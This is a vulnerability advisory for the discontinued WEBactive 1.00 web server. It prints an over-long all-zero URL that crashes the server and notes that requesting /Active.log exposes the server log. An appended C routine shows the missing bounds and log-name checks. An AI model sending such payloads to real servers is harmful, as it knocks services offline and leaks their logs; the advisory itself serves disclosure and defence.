Application: ITAfrica's WEBactive version 1.00
Problem Type: Denial of Service
Author: Prizm (Prizm@RESENTMENT.org)
Platform(s): Windows 95/NT
Vendor Status: Not Informed, Project discontinued (I think)
Download URL: ftp://ftp.mira.net/mirrors/winsock-l/Windows95/Daemons/HTTPD/activ100.zip

Product Description
-------------------
WEBactive HTTP Server 1.00 is an HTTP/1.00-compliant World Wide Web server daemon for Windows 95 or Windows NT, specifically designed for the SOHO (Small Office/Home) environment. It will operate on any TCP/IP connection to the Internet, whether via temporary dial-up or permanent leased-line connectivity.

Problem
-------
The problem is with bounds checking: when you request 280 characters, Webactiv.exe just shuts down.

Quick Example:

http://somedomain/0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000

*Also*, by simply requesting /Active.log, you can view the webserver log, because Active.log is the default logfile name and the default directory is where that file is stored.

Vendor Status
-------------
Heh, this server was discontinued as far as I see... it is rather dated and doesn't support much. Seeing as it was last revised in 1996, I think contacting the vendor would be rather meaningless... Also, the fact that it is HTTP/1.00-compliant kind of hints it is no longer being updated.

Greetings
---------
Lamagra, Scrippie, eth0, Cruciphux/HWA and many others...
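
Added example, not part of the original advisory and not WEBactive's code: a C request-line check of the kind the Problem section says is missing, which refuses an over-long path before copying it and denies the default log name. The 255-byte limit, the function names and the status codes returned are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define PATH_LIMIT 255          /* assumed limit; WEBactive's real buffer size is unknown */
#define LOG_PATH "/Active.log"  /* default log file name given in the advisory */

/* Case-insensitive equality, since Windows file names ignore case. */
static int same_nocase(const char *a, const char *b)
{
    while (*a && *b && tolower((unsigned char)*a) == tolower((unsigned char)*b)) {
        a++;
        b++;
    }
    return *a == '\0' && *b == '\0';
}

/* Returns an HTTP status; on 200, out holds the NUL-terminated request path. */
int check_request_line(const char *line, char *out, size_t outsz)
{
    const char *start;
    size_t len;

    if (strncmp(line, "GET /", 5) != 0)
        return 400;                         /* malformed or unsupported request */
    start = line + 4;                       /* points at the leading '/' */
    len = strcspn(start, " \r\n");          /* path ends at a space or line end */
    if (len > PATH_LIMIT || len >= outsz)
        return 414;                         /* refuse before copying anything */
    memcpy(out, start, len);
    out[len] = '\0';
    return same_nocase(out, LOG_PATH) ? 403 : 200;
}

/* Constructed sample: "GET /" followed by n zeros, as in the advisory's example. */
int status_for_zero_path(size_t n)
{
    char line[1024], path[PATH_LIMIT + 1];

    if (n + 15 > sizeof line)
        return -1;
    memcpy(line, "GET /", 5);
    memset(line + 5, '0', n);
    memcpy(line + 5 + n, " HTTP/1.0", 10);  /* 9 characters plus the NUL */
    return check_request_line(line, path, sizeof path);
}

int main(void)
{
    printf("280 zeros: %d\n", status_for_zero_path(280));
    return 0;
}
```

Matching the log name is only a stopgap; keeping the log file outside the served directory removes the exposure regardless of how the path is spelled.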